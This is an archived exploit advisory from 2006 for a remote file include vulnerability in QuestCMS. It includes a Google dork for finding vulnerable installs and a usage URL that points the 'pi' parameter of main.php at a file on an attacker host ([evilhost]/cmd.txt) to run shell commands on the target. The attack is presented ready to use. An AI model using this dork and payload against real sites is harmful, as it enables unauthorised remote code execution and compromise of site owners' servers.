Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13756
HistoryAug 07, 2006 - 12:00 a.m.

Questcms Remote File Include Vulnerability

2006-08-0700:00:00
vulners.com
41

!!!WWW.SİBERSAVASCİLAR.COM!!!

Title : Questcms Remote File Include Vulnerability


#Author: Crackers_Child

#cont@ct: [email protected]


Affected software description :

Application : Questwork Web Content Management system (QuestCMS)
URL : http://www.questwork.com


dork : allinurl:"/questcms/"
Exploit :


Usage:

http://[target]/[questcms_path]/main/main.php?pi=http://[evilhost]/cmd.txt?&cmd=ls


greets:

X_ALPREN_X,Root_Mor and My Other Friends


--------------------------------- [ WWW.SİBERSAVASCİLAR.COM ] --------------------------------------